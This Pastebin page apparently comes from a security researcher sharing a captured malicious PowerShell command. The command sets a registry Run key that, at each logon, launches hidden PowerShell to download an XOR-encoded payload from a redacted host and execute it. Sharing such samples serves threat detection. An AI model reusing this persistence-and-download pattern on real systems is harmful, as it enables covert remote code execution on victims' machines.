Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malicious Powershell
- *******
- CommandLine = reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v Task /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden -Enc $WC=NeW-OBjEct SyStEM.Net.WeBCLIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeaDErs.AdD('User-Agent',$u);$wc.PRoXY = [SYSTEM.Net.WebREQUEST]::DEFaUlTWEbProXY;$Wc.PrOXy.CREdENtialS = [SYsTEm.NET.CREdENtIALCacHe]::DEfAuLTNetWoRkCREdenTiaLs;$K='j}?1`(^lr.kOCQBc4Xo@P!zK5T)&bdyn';$i=0;[chaR[]]$b=([ChAr[]]($wc.DoWnlOADStRinG("http://X.X.X.X/file.asp")))|%{$_-BXOr$k[$I++%$k.LEnGTH]};IEX ($B-joiN'')"
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment